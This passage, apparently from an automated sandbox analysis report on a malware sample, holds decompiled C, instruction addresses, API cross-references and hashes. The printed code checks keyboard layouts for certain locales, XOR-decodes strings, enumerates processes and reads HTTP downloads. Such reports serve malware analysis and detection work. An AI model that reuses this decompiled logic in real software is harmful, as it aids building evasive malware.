							_t249 = GetKeyboardLayoutList(0x400,  &_v1684);
							_t445 = 0;
							_v1688 = _t249;
							__eflags = _t249;
							if(_t249 <= 0) {
								L63:
								 *[fs:0x0] = _v36;
								_pop(_t446);
								_pop(_t458);
								__eflags = _v44 ^ _t473;
								return E0040EB3F(_t457, _t363, _v44 ^ _t473, _t434, _t446, _t458);
							} else {
								do {
									_t252 =  *(_t473 + _t445 * 4 - 0x610) & 0x0000ffff;
									_v1588 = _t252;
									GetLocaleInfoA(_t252, 2,  &_v552, 0x1f4); // executed
									_t254 =  &_v552;
									_v1616 = 0;
									_v1600 = 0;
									_t435 = _t254 + 1;
									_v1596 = 0xf;
									_v1616 = 0;
									do {
										_t399 =  *_t254;
										_t254 = _t254 + 1;
										__eflags = _t399;
									} while (_t399 != 0);
									E004026C0(_t363,  &_v1616,  &_v552, _t254 - _t435);
									_t401 = _v1588;
									_v1592 = _t401;
									_v28 = 1;
									_t258 =  *(_t457 + 4);
									__eflags = _t258 -  *(_t457 + 8);
									if(_t258 ==  *(_t457 + 8)) {
										_push( &_v1616);
										_push(_t258);
										E0040CBC0(_t363, _t457, _t445, _t457);
										_t434 = _v1596;
									} else {
										asm("movups xmm0, [ebp-0x638]");
										_t434 = 0xf;
										_v1616 = 0;
										asm("movups [eax], xmm0");
										asm("movq xmm0, [ebp-0x628]");
										asm("movq [eax+0x10], xmm0");
										 *(_t258 + 0x18) = _t401;
										 *(_t457 + 4) =  *(_t457 + 4) + 0x1c;
									}
									_v28 = 0;
									__eflags = _t434 - 0x10;
									if(_t434 < 0x10) {
										goto L62;
									} else {
										_t404 = _v1616;
										_t434 = _t434 + 1;
										_t260 = _t404;
										__eflags = _t434 - 0x1000;
										if(_t434 < 0x1000) {
											L61:
											_push(_t434);
											E0040ED7F(_t404);
											_t496 = _t496 + 8;
											goto L62;
										} else {
											_t404 =  *(_t404 - 4);
											_t434 = _t434 + 0x23;
											__eflags = _t260 - _t404 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												E004134A7(_t363, _t434, __eflags);
												asm("int3");
												_push(_t473);
												_t475 = _t496;
												_push(0xffffffff);
												_push(0x42c535);
												_push( *[fs:0x0]);
												_t499 = _t496 - 0x5c;
												_t266 =  *0x43d054; // 0x8e1b5714
												_t267 = _t266 ^ _t475;
												_v1760 = _t267;
												_push(_t363);
												_push(_t457);
												_push(_t445);
												_push(_t267);
												 *[fs:0x0] =  &_v1756;
												_t365 = 0;
												_t405 =  &_v1780;
												asm("xorps xmm0, xmm0");
												_v1816 = 0;
												asm("movq [ebp-0x24], xmm0");
												_v1772 = 0;
												L51(); // executed
												_v1748 = 0;
												_t269 = _v1776;
												_t447 = _v1780;
												_v1820 = _t269;
												__eflags = _t447 - _t269;
												if(_t447 == _t269) {
													L92:
													_t366 = 0;
													__eflags = 0;
													goto L93;
												} else {
													_v52 = 0x5d5d5b7c;
													_v48 = 0x2e404f47;
													_t464 =  *( *[fs:0x2c]);
													_v108 = _t464;
													do {
														E0040BB10(_t365,  &_v92, _t434, _t447, _t447);
														_v68 =  *((intOrPtr*)(_t447 + 0x18));
														_v32 = 1;
														_t302 =  *0x450fe0; // 0x8000000f
														__eflags = _t302 -  *((intOrPtr*)(_t464 + 4));
														if(_t302 >  *((intOrPtr*)(_t464 + 4))) {
															E0040EEC8(_t302, 0x450fe0);
															_t499 = _t499 + 4;
															__eflags =  *0x450fe0 - 0xffffffff;
															if(__eflags == 0) {
																_t140 =  &_v52; // 0x5d5d5b7c
																 *0x450d20 =  *_t140;
																_t141 =  &_v48; // 0x2e404f47
																 *0x450d24 =  *_t141;
																E0040F1DA( &_v92, __eflags, 0x42ce60);
																E0040EE7E(0x450fe0);
																_t499 = _t499 + 8;
															}
														}
														_t303 =  *0x450d27; // 0x0
														__eflags = _t303;
														if(_t303 != 0) {
															 *0x450d20 =  *0x450d20 ^ 0x0000002e;
															 *0x450d21 =  *0x450d21 ^ 0x0000002e;
															 *0x450d22 =  *0x450d22 ^ 0x0000002e;
															 *0x450d23 =  *0x450d23 ^ 0x0000002e;
															 *0x450d24 =  *0x450d24 ^ 0x0000002e;
															 *0x450d25 =  *0x450d25 ^ 0x0000002e;
															 *0x450d26 =  *0x450d26 ^ 0x0000002e;
															_t327 = _t303 ^ 0x0000002e;
															__eflags = _t327;
															 *0x450d27 = _t327;
														}
														_t304 = 0x450d20;
														_v132 = 0;
														_v116 = 0;
														_v112 = 0xf;
														_t145 =  &(_t304[1]); // 0x450d21
														_t440 = _t145;
														do {
															_t422 =  *_t304;
															_t304 =  &(_t304[1]);
															__eflags = _t422;
														} while (_t422 != 0);
														E004026C0(_t365,  &_v132, 0x450d20, _t304 - _t440);
														_t457 = _v92;
														_t434 = _v76;
														__eflags = _v112 - 0x10;
														_v100 = _t365 | 0x00000001;
														_t366 = _v132;
														_t308 =  >=  ? _t366 :  &_v132;
														__eflags = _v72 - 0x10;
														_t405 =  >=  ? _t457 :  &_v92;
														_t309 = E004028A0(_t405, _t434, _t405,  >=  ? _t366 :  &_v132, _v116);
														_t499 = _t499 + 0xc;
														__eflags = _t309 - 0xffffffff;
														if(_t309 != 0xffffffff) {
															L76:
															_v93 = 1;
														} else {
															__eflags = _v72 - 0x10;
															_t434 = _v76;
															_t405 =  >=  ? _t457 :  &_v92;
															_t326 = E004028A0(_t405, _t434, _t405, 0x439a6c, 7);
															_t499 = _t499 + 0xc;
															_v93 = 0;
															__eflags = _t326 - 0xffffffff;
															if(_t326 != 0xffffffff) {
																goto L76;
															}
														}
														_v100 = _v100 & 0xfffffffe;
														_t310 = _v112;
														__eflags = _t310 - 0x10;
														if(_t310 < 0x10) {
															L81:
															__eflags = _v93;
															if(_v93 != 0) {
																L97:
																_t311 = _v72;
																__eflags = _t311 - 0x10;
																if(_t311 < 0x10) {
																	L101:
																	_t447 = _v64;
																	_t366 = 1;
																	L93:
																	__eflags = _t447;
																	if(_t447 == 0) {
																		L103:
																		 *[fs:0x0] = _v40;
																		_pop(_t448);
																		_pop(_t459);
																		_pop(_t367);
																		__eflags = _v44 ^ _t475;
																		return E0040EB3F(_t366, _t367, _v44 ^ _t475, _t434, _t448, _t459);
																	} else {
																		_push(_t405);
																		E0040D300(_t447, _v60, _t447, _t457);
																		_t460 = _v64;
																		_t501 = _t499 + 4;
																		_t434 = (0x92492493 * (_v56 - _t460) >> 0x20) + _v56 - _t460 >> 4;
																		_t278 = _t460;
																		_t415 = ((_t434 >> 0x1f) + _t434) * 8 - (_t434 >> 0x1f) + _t434 << 2;
																		__eflags = _t415 - 0x1000;
																		if(_t415 < 0x1000) {
																			L102:
																			_push(_t415);
																			E0040ED7F(_t460);
																			goto L103;
																		} else {
																			_t460 =  *((intOrPtr*)(_t460 - 4));
																			_t415 = _t415 + 0x23;
																			__eflags = _t278 - _t460 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				E004134A7(_t366, _t434, __eflags);
																				goto L105;
																			} else {
																				goto L102;
																			}
																		}
																	}
																} else {
																	_t187 = _t311 + 1; // 0x11
																	_t405 = _t187;
																	_t312 = _t457;
																	__eflags = _t405 - 0x1000;
																	if(_t405 < 0x1000) {
																		L100:
																		_push(_t405);
																		E0040ED7F(_t457);
																		_t499 = _t499 + 8;
																		goto L101;
																	} else {
																		_t460 =  *((intOrPtr*)(_t457 - 4));
																		_t415 = _t405 + 0x23;
																		__eflags = _t312 - _t460 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L105;
																		} else {
																			goto L100;
																		}
																	}
																}
															} else {
																_t316 = _v68;
																__eflags = _t316 - 0x419;
																if(_t316 == 0x419) {
																	goto L97;
																} else {
																	__eflags = _t316 - 0x422;
																	if(_t316 == 0x422) {
																		goto L97;
																	} else {
																		__eflags = _t316 - 0x423;
																		if(_t316 == 0x423) {
																			goto L97;
																		} else {
																			__eflags = _t316 - 0x43f;
																			if(_t316 == 0x43f) {
																				goto L97;
																			} else {
																				_v32 = 0;
																				_t317 = _v72;
																				__eflags = _t317 - 0x10;
																				if(_t317 < 0x10) {
																					goto L90;
																				} else {
																					_t171 = _t317 + 1; // 0x11
																					_t405 = _t171;
																					_t318 = _t457;
																					__eflags = _t405 - 0x1000;
																					if(_t405 < 0x1000) {
																						L89:
																						_push(_t405);
																						E0040ED7F(_t457);
																						_t499 = _t499 + 8;
																						goto L90;
																					} else {
																						_t460 =  *((intOrPtr*)(_t457 - 4));
																						_t415 = _t405 + 0x23;
																						__eflags = _t318 - _t460 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L105;
																						} else {
																							goto L89;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t164 = _t310 + 1; // 0x11
															_t405 = _t164;
															_t322 = _t366;
															__eflags = _t405 - 0x1000;
															if(_t405 < 0x1000) {
																L80:
																_push(_t405);
																E0040ED7F(_t366);
																_t457 = _v92;
																_t499 = _t499 + 8;
																goto L81;
															} else {
																_t366 =  *(_t366 - 4);
																_t415 = _t405 + 0x23;
																__eflags = _t322 - _t366 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	L105:
																	E004134A7(_t366, _t434, __eflags);
																	asm("int3");
																	asm("int3");
																	_push(_t475);
																	_t477 = _t501;
																	_t284 =  *0x43d054; // 0x8e1b5714
																	_v1872 = _t284 ^ _t477;
																	_push(_t460);
																	_push(_t447);
																	_t449 = _t415;
																	_v2140 = _t449;
																	_v2140 = _t449;
																	_t286 =  *0x439a7c; // 0x3e
																	asm("movq xmm0, [0x439a74]");
																	_v2124 = _t286;
																	asm("movq [ebp-0x108], xmm0");
																	E00410A80(_t449,  &_v2122, 0, 0xfa);
																	_t462 = OpenProcess(0x410, 0, _t434);
																	__eflags = _t462;
																	if(_t462 != 0) {
																		_t297 =  &_v304;
																		__imp__K32EnumProcessModules(_t462, _t297, 4,  &_v300); // executed
																		__eflags = _t297;
																		if(_t297 != 0) {
																			__imp__K32GetModuleBaseNameA(_t462, _v304,  &_v296, 0x104); // executed
																		}
																	}
																	FindCloseChangeNotification(_t462); // executed
																	_t416 =  &_v296;
																	 *_t449 = 0;
																	_t449[4] = 0;
																	_t439 = _t416 + 1;
																	_t449[5] = 0xf;
																	 *_t449 = 0;
																	do {
																		_t291 =  *_t416;
																		_t416 = _t416 + 1;
																		__eflags = _t291;
																	} while (_t291 != 0);
																	E004026C0(_t366, _t449,  &_v296, _t416 - _t439);
																	_pop(_t450);
																	__eflags = _v36 ^ _t477;
																	_pop(_t463);
																	return E0040EB3F(_t449, _t366, _v36 ^ _t477, _t439, _t450, _t463);
																} else {
																	goto L80;
																}
															}
														}
														goto L112;
														L90:
														_t365 = _v100;
														_t447 = _t447 + 0x1c;
														_t464 = _v108;
														__eflags = _t447 - _v104;
													} while (_t447 != _v104);
													_t447 = _v64;
													goto L92;
												}
											} else {
												goto L61;
											}
										}
									}
									goto L112;
									L62:
									_t445 = _t445 + 1;
									__eflags = _t445 - _v1580;
								} while (_t445 < _v1580);
								goto L63;
							}
						} else {
							goto L13;
						}
					}
				}
				L112:
			}

0x00404840
0x00404840
0x00404841
0x00404849
0x00404850
0x00404854
0x00404856
0x00404858
0x00404863
0x00404864
0x00404865
0x00404868
0x0040486d
0x0040486f
0x00404872
0x00404874
0x00404878
0x00404884
0x0040488b
0x00404892
0x00404899
0x0040489b
0x004048a6
0x004048ad
0x004048b2
0x004048b5
0x004048bc
0x004048be
0x004048cb
0x004048d3
0x004048d8
0x004048e5
0x004048ea
0x004048ea
0x004048bc
0x004048f4
0x004048f6
0x00404900
0x00404900
0x00404907
0x00404908
0x00404900
0x0040490d
0x00404912
0x00404919
0x00404920
0x00404927
0x0040492b
0x0040492b
0x00404930
0x00404930
0x00404932
0x00404933
0x00404942
0x00404947
0x00404955
0x0040495a
0x0040495f
0x00404961
0x00404968
0x0040496a
0x00404971
0x00404974
0x0040497b
0x0040497f
0x0040497f
0x00404982
0x00404982
0x00404984
0x00404985
0x00404990
0x00404995
0x00404999
0x0040499f
0x004049cd
0x004049d2
0x004049d7
0x004049de
0x004049e5
0x004049e9
0x004049eb
0x004049f3
0x00404a16
0x00404a1a
0x00404a1d
0x00404a20
0x00404a22
0x004049f5
0x004049fb
0x004049fe
0x00404a02
0x00404a04
0x00404a07
0x00404a08
0x00404a0d
0x00404a10
0x00404a10
0x00404a27
0x00404a2c
0x00404a33
0x00404a3a
0x00404a44
0x00404a4b
0x00404a50
0x00404a53
0x00404a5a
0x00404a5c
0x00404a69
0x00404a71
0x00404a76
0x00404a83
0x00404a88
0x00404a88
0x00404a5a
0x00404a8b
0x00404a92
0x00404a94
0x00404a9b
0x00404aa2
0x00404aa9
0x00404ab0
0x00404ab7
0x00404abe
0x00404ac5
0x00404ace
0x00404ace
0x00404ad3
0x00404ad6
0x00404adb
0x00404add
0x00404add
0x00404ae0
0x00404ae6
0x00404aed
0x00404af4
0x00404af4
0x00404af6
0x00404af7
0x00404b05
0x00404b0d
0x00404b12
0x00404b15
0x00404b1b
0x00404b20
0x00404b2a
0x00404b31
0x00404b36
0x00404b39
0x00404b40
0x00404b42
0x00404b51
0x00404b58
0x00404b5d
0x00404b6a
0x00404b6f
0x00404b6f
0x00404b40
0x00404b72
0x00404b79
0x00404b7b
0x00404b84
0x00404b8b
0x00404b8f
0x00404b94
0x00404b94
0x00404b9b
0x00404b9e
0x00404ba3
0x00404ba5
0x00404ba5
0x00404ba8
0x00404bae
0x00404bb5
0x00404bc0
0x00404bc0
0x00404bc2
0x00404bc3
0x00404bd1
0x00404bd9
0x00404bde
0x00404be1
0x00404be9
0x00404bee
0x00404bf8
0x00404bff
0x00404c04
0x00404c07
0x00404c0e
0x00404c10
0x00404c20
0x00404c27
0x00404c2d
0x00404c3a
0x00404c3f
0x00404c3f
0x00404c0e
0x00404c49
0x00404c4b
0x00404c52
0x00404c57
0x00404c5e
0x00404c62
0x00404c70
0x00404c70
0x00404c77
0x00404c78
0x00404c70
0x00404c7d
0x00404c80
0x00404c85
0x00404c87
0x00404c87
0x00404c8a
0x00404c90
0x00404c97
0x00404ca0
0x00404ca0
0x00404ca2
0x00404ca3
0x00404cb1
0x00404cb9
0x00404cbe
0x00404cc3
0x00404cd8
0x00404cd8
0x00404cd1
0x00404cd1
0x00404cd1
0x00404cda
0x00404ce0
0x00404d0a
0x00404d0f
0x00404d17
0x00404d18
0x00404d29
0x00404ce2
0x00404ce2
0x00404ce5
0x00404ce6
0x00404cee
0x00404d00
0x00404d00
0x00404d02
0x00000000
0x00404cf0
0x00404cf0
0x00404cf3
0x00404cfe
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cfe
0x00404cee
0x004049a1
0x004049a1
0x004049a4
0x004049a5
0x004049ad
0x004049c3
0x004049c3
0x004049c5
0x004049ca
0x00000000
0x004049af
0x004049af
0x004049b2
0x004049bd
0x00404d2a
0x00404d2f
0x00404d2f
0x00404d34
0x00404d35
0x00404d36
0x00404d37
0x00404d38
0x00404d39
0x00404d3a
0x00404d3b
0x00404d3c
0x00404d3d
0x00404d3e
0x00404d3f
0x00404d40
0x00404d41
0x00404d49
0x00404d4c
0x00404d50
0x00404d54
0x00404d56
0x00404d58
0x00404d63
0x00404d64
0x00404d65
0x00404d6b
0x00404d70
0x00404d72
0x00404d75
0x00404d76
0x00404d77
0x00404d7b
0x00404d81
0x00404d83
0x00404d89
0x00404d8f
0x00404d92
0x00404d9c
0x00404da0
0x00404da7
0x00404dad
0x00404db4
0x00404dc1
0x00404dce
0x00404dd8
0x00404dde
0x00404de0
0x00404de6
0x00404de8
0x00404efa
0x00404eff
0x00404f07
0x00404f08
0x00404f0c
0x00404f19
0x00404df0
0x00404df0
0x00404df0
0x00404e07
0x00404e0d
0x00404e13
0x00404e19
0x00404e23
0x00404e2d
0x00404e30
0x00404e3a
0x00404e41
0x00404e41
0x00404e43
0x00404e44
0x00404e44
0x00404e58
0x00404e5d
0x00404e63
0x00404e69
0x00404e70
0x00404e73
0x00404e76
0x00404eaa
0x00404eab
0x00404eae
0x00404eb3
0x00404e78
0x00404e78
0x00404e7f
0x00404e84
0x00404e8b
0x00404e8e
0x00404e96
0x00404e9b
0x00404e9e
0x00404e9e
0x00404eb9
0x00404ebd
0x00404ec0
0x00000000
0x00404ec2
0x00404ec2
0x00404ec8
0x00404ec9
0x00404ecb
0x00404ed1
0x00404ee3
0x00404ee3
0x00404ee5
0x00404eea
0x00000000
0x00404ed3
0x00404ed3
0x00404ed6
0x00404ede
0x00404ee1
0x00404f1a
0x00404f1f
0x00404f20
0x00404f21
0x00404f23
0x00404f25
0x00404f30
0x00404f31
0x00404f34
0x00404f39
0x00404f3b
0x00404f3e
0x00404f3f
0x00404f40
0x00404f41
0x00404f45
0x00404f4b
0x00404f4d
0x00404f50
0x00404f53
0x00404f56
0x00404f5b
0x00404f5e
0x00404f63
0x00404f66
0x00404f69
0x00404f6c
0x00404f6f
0x00404f71
0x00405185
0x00405185
0x00405185
0x00000000
0x00404f77
0x00404f7d
0x00404f84
0x00404f8b
0x00404f8d
0x00404f90
0x00404f94
0x00404f9c
0x00404f9f
0x00404fa3
0x00404fa8
0x00404fae
0x00404fb5
0x00404fba
0x00404fbd
0x00404fc4
0x00404fc6
0x00404fc9
0x00404fce
0x00404fd6
0x00404fdb
0x00404fe8
0x00404fed
0x00404fed
0x00404fc4
0x00404ff0
0x00404ff5
0x00404ff7
0x00404ff9
0x00405000
0x00405007
0x0040500e
0x00405015
0x0040501c
0x00405023
0x0040502a
0x0040502a
0x0040502c
0x0040502c
0x00405031
0x00405036
0x0040503d
0x00405044
0x0040504b
0x0040504b
0x00405050
0x00405050
0x00405052
0x00405053
0x00405053
0x00405062
0x0040506a
0x00405070
0x00405079
0x0040507d
0x00405080
0x00405083
0x00405086
0x0040508b
0x0040508f
0x00405094
0x00405097
0x0040509a
0x004050c2
0x004050c2
0x0040509c
0x0040509c
0x004050a3
0x004050a8
0x004050b1
0x004050b6
0x004050b9
0x004050bd
0x004050c0
0x00000000
0x00000000
0x004050c0
0x004050c6
0x004050ca
0x004050cd
0x004050d0
0x00405100
0x00405100
0x00405104
0x004051e0
0x004051e0
0x004051e3
0x004051e6
0x0040520f
0x0040520f
0x00405212
0x00405187
0x00405187
0x00405189
0x00405226
0x0040522b
0x00405233
0x00405234
0x00405235
0x00405239
0x00405243
0x0040518f
0x00405192
0x00405195
0x004051a2
0x004051a5
0x004051ae
0x004051c1
0x004051c3
0x004051c6
0x004051cc
0x0040521c
0x0040521c
0x0040521e
0x00000000
0x004051ce
0x004051ce
0x004051d1
0x004051d9
0x004051dc
0x00405244
0x00000000
0x004051de
0x00000000
0x004051de
0x004051dc
0x004051cc
0x004051e8
0x004051e8
0x004051e8
0x004051eb
0x004051ed
0x004051f3
0x00405205
0x00405205
0x00405207
0x0040520c
0x00000000
0x004051f5
0x004051f5
0x004051f8
0x00405200
0x00405203
0x00000000
0x00000000
0x00000000
0x00000000
0x00405203
0x004051f3
0x0040510a
0x0040510a
0x0040510d
0x00405112
0x00000000
0x00405118
0x00405118
0x0040511d
0x00000000
0x00405123
0x00405123
0x00405128
0x00000000
0x0040512e
0x0040512e
0x00405133
0x00000000
0x00405139
0x00405139
0x0040513d
0x00405140
0x00405143
0x00000000
0x00405145
0x00405145
0x00405145
0x00405148
0x0040514a
0x00405150
0x00405166
0x00405166
0x00405168
0x0040516d
0x00000000
0x00405152
0x00405152
0x00405155
0x0040515d
0x00405160
0x00000000
0x00000000
0x00000000
0x00000000
0x00405160
0x00405150
0x00405143
0x00405133
0x00405128
0x0040511d
0x00405112
0x004050d2
0x004050d2
0x004050d2
0x004050d5
0x004050d7
0x004050dd
0x004050f3
0x004050f3
0x004050f5
0x004050fa
0x004050fd
0x00000000
0x004050df
0x004050df
0x004050e2
0x004050ea
0x004050ed
0x00405249
0x00405249
0x0040524e
0x0040524f
0x00405250
0x00405251
0x00405259
0x00405260
0x00405263
0x00405264
0x00405265
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052b8
0x004052ba
0x004052c5
0x004052cd
0x004052d3
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040531a
0x0040532a
0x00405334
0x00405335
0x00405337
0x00405340
0x00000000
0x00000000
0x00000000
0x004050ed
0x004050dd
0x00000000
0x00405170
0x00405170
0x00405173
0x00405176
0x00405179
0x00405179
0x00405182
0x00000000
0x00405182
0x00000000
0x00000000
0x00000000
0x00404ee1
0x00404ed1
0x00000000
0x00404eed
0x00404eed
0x00404eee
0x00404eee
0x00000000
0x00404df0
0x00000000
0x00000000
0x00000000
0x004049bd
0x004049ad
0x00000000

APIs

Part of subcall function 0040EEC8: EnterCriticalSection.KERNEL32(004504FC,00450D61,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EED3
Part of subcall function 0040EEC8: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EF10

__Init_thread_footer.LIBCMT ref: 004048E5

Part of subcall function 0040EE7E: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EE88
Part of subcall function 0040EE7E: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EEBB
Part of subcall function 0040EE7E: RtlWakeAllConditionVariable.NTDLL ref: 0040EF32

__Init_thread_footer.LIBCMT ref: 00404A83
__Init_thread_footer.LIBCMT ref: 00404B6A
__Init_thread_footer.LIBCMT ref: 00404C3A

Strings

mmBK, xrefs: 00404A2C
\Desktop, xrefs: 004049EB
{}k|, xrefs: 00404884
O@K\, xrefs: 00404A33

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CriticalInit_thread_footerSection$EnterLeave$ConditionVariableWake
String ID: O@K\$\Desktop$mmBK${}k|
API String ID: 4264893276-1521651405
Opcode ID: c35064b14b9dffba6d1e4db0a2574021912a52bb2d95535e1f81fe600cbb8f5b
Instruction ID: 59b664f8313e46badde9086281928930e0b8f00e87856fe9bc78e8ec5598def6
Opcode Fuzzy Hash: c35064b14b9dffba6d1e4db0a2574021912a52bb2d95535e1f81fe600cbb8f5b
Instruction Fuzzy Hash: 6AD147B59003848AEB14DF78EC067AE7B70AF46308F14467AD8407B2D3D7B8A949C79D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B40 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00401B40(void* __ebx, void* __ecx, void* __edi, void* _a4) {
				intOrPtr _v4;
				char* _v8;
				char* _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				char _v52;
				void _v56;
				intOrPtr _v60;
				char* _v64;
				char* _v80;
				intOrPtr _v84;
				signed int _v88;
				void* _v92;
				void _v288;
				int _v292;
				long _v296;
				char* _v300;
				char _v316;
				char* _v320;
				char* _v324;
				short* _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v356;
				signed int _v360;
				char* _v364;
				char* _v380;
				intOrPtr* _v488;
				char _v508;
				signed int _v516;
				intOrPtr _v520;
				char* _v524;
				char* _v540;
				intOrPtr _v544;
				char* _v572;
				void* __esi;
				void* __ebp;
				signed int _t210;
				signed int _t211;
				int _t218;
				char* _t219;
				char* _t230;
				intOrPtr _t231;
				short* _t238;
				short _t241;
				intOrPtr* _t244;
				void* _t245;
				char* _t247;
				short* _t251;
				char* _t256;
				char* _t266;
				signed int _t273;
				signed int _t275;
				void* _t281;
				intOrPtr _t294;
				signed int _t299;
				char* _t300;
				void* _t308;
				signed int _t313;
				void* _t319;
				char* _t322;
				intOrPtr _t330;
				int _t332;
				void* _t333;
				void* _t334;
				void* _t336;
				char* _t337;
				signed int _t338;
				void* _t340;
				intOrPtr _t341;
				void* _t343;
				void* _t344;
				intOrPtr* _t353;
				int _t357;
				short* _t364;
				void* _t371;
				char* _t373;
				char* _t376;
				intOrPtr* _t377;
				char _t391;
				char* _t393;
				char* _t400;
				void* _t404;
				short* _t407;
				signed int _t410;
				char* _t414;
				intOrPtr* _t416;
				intOrPtr _t418;
				signed int _t419;
				void* _t420;
				void* _t423;
				void* _t425;
				void* _t426;
				int _t427;
				short* _t428;
				void* _t430;
				intOrPtr _t432;
				signed int _t433;
				signed int _t434;
				void* _t436;
				intOrPtr* _t437;
				intOrPtr _t438;
				void* _t440;
				void* _t441;
				void* _t442;
				void* _t443;
				void* _t444;
				intOrPtr _t445;
				void* _t447;
				void* _t448;
				signed int _t451;
				signed int _t452;
				void* _t454;
				void* _t455;
				void* _t456;
				void* _t457;
				signed int _t458;
				void* _t459;
				void* _t461;
				void* _t462;

				_push(0xffffffff);
				_push(0x42c24b);
				_push( *[fs:0x0]);
				_t455 = _t454 - 0x170;
				_t210 =  *0x43d054; // 0x8e1b5714
				_t211 = _t210 ^ _t451;
				_v24 = _t211;
				_push(__ebx);
				_push(__edi);
				_push(_t211);
				 *[fs:0x0] =  &_v16;
				_t440 = __ecx;
				_t466 =  *((intOrPtr*)(__ecx + 0x28));
				_t425 = _a4;
				_v328 = _t425;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					_v332 =  *((intOrPtr*)(__ecx + 0x34));
				} else {
					 *((intOrPtr*)(__ecx + 0x30)) = 0x7800;
					_t330 = E0040ED8D(__ebx, _t425, __ecx, _t466, 0x7800);
					_t455 = _t455 + 4;
					 *((intOrPtr*)(_t440 + 0x28)) = _t330;
					 *(_t440 + 0x34) = 0;
					_v332 = 0;
				}
				_v296 = 0;
				InternetSetFilePointer(_t425, 0, 0, 0, 0);
				do {
					_t218 = InternetReadFile(_t425,  &(( *(_t440 + 0x34))[ *((intOrPtr*)(_t440 + 0x28))]), 0x3e8,  &_v296); // executed
					_t403 = _v296;
					_t332 = _t218;
					_t219 =  *(_t440 + 0x30);
					 *(_t440 + 0x34) =  &(( *(_t440 + 0x34))[_t403]);
					_t467 = _t219 -  *(_t440 + 0x34) - 0x3e8;
					if(_t219 -  *(_t440 + 0x34) <= 0x3e8) {
						 *(_t440 + 0x30) =  &(_t219[0x7800]);
						_t438 = E0040ED8D(_t332, _t425, _t440, _t467,  &(_t219[0x7800]));
						E00410440(_t438,  *((intOrPtr*)(_t440 + 0x28)),  &(( *(_t440 + 0x34))[1]));
						L0040EB4D( *((intOrPtr*)(_t440 + 0x28)));
						_t403 = _v296;
						_t455 = _t455 + 0x14;
						 *((intOrPtr*)(_t440 + 0x28)) = _t438;
						_t425 = _v328;
					}
				} while (_t332 != 0 && _t403 != 0);
				_v296 = 0x103;
				E00410A80(_t425,  &_v288, 0, 0x104);
				_t456 = _t455 + 0xc;
				if(HttpQueryInfoA(_t425, 0x1d,  &_v288,  &_v296, 0) == 0) {
					L32:
					( *(_t440 + 0x34))[ *((intOrPtr*)(_t440 + 0x28))] = 0;
					 *[fs:0x0] = _v16;
					_pop(_t426);
					_pop(_t441);
					_pop(_t333);
					return E0040EB3F( *(_t440 + 0x34) - _v332, _t333, _v24 ^ _t451, _t403, _t426, _t441);
				} else {
					_v324 = 0;
					_t230 =  &_v316;
					_v320 = 0;
					__imp__CoCreateInstance(_t230, 0, 1, 0x42e2c0,  &_v324);
					if(_t230 < 0 || _v324 == 0) {
						goto L32;
					} else {
						_t353 =  &_v288;
						_v356 = 0;
						_v340 = 0;
						_t404 = _t353 + 1;
						_v336 = 0xf;
						_v356 = 0;
						asm("o16 nop [eax+eax]");
						do {
							_t231 =  *_t353;
							_t353 = _t353 + 1;
						} while (_t231 != 0);
						E004026C0(_t332,  &_v356,  &_v288, _t353 - _t404);
						_v8 = 0;
						_t334 = MultiByteToWideChar;
						_t357 =  &(_v340[1]);
						_t235 =  >=  ? _v356 :  &_v356;
						_v292 = _t357;
						_t427 = MultiByteToWideChar(0, 0,  >=  ? _v356 :  &_v356, _t357, 0, 0);
						_t238 = E0040ED8D(MultiByteToWideChar, _t427, _t440, _v336 - 0x10,  ~(0 | _v336 - 0x00000010 > 0x00000000) | _t236 * 0x00000002);
						_t457 = _t456 + 4;
						_v328 = _t238;
						_t363 =  >=  ? _v356 :  &_v356;
						_t428 = _t238;
						MultiByteToWideChar(0, 0,  >=  ? _v356 :  &_v356, _v292, _t428, _t427);
						_t364 = _t428;
						_v380 = 0;
						_v364 = 0;
						_v360 = 7;
						_v380 = 0;
						_t66 =  &(_t364[1]); // 0x2
						_t407 = _t66;
						do {
							_t241 =  *_t364;
							_t364 =  &(_t364[1]);
						} while (_t241 != 0);
						E00402560(MultiByteToWideChar,  &_v380, _t428);
						L0040EB4D(_t428);
						_t458 = _t457 + 4;
						_v8 = 1;
						_t244 = _v324;
						_t409 =  >=  ? _v380 :  &_v380;
						_t245 =  *((intOrPtr*)( *_t244 + 0x10))(_t244,  >=  ? _v380 :  &_v380, L"text",  &_v320, _t364 - _t407 >> 1);
						_v8 = 0;
						_t430 = _t245;
						_t410 = _v360;
						if(_t410 < 8) {
							L19:
							_v8 = 0xffffffff;
							_t403 = _v336;
							_v364 = 0;
							_v360 = 7;
							_v380 = 0;
							if(_t403 < 0x10) {
								L23:
								if(_t430 >= 0) {
									_t487 = _v320;
									if(_v320 != 0) {
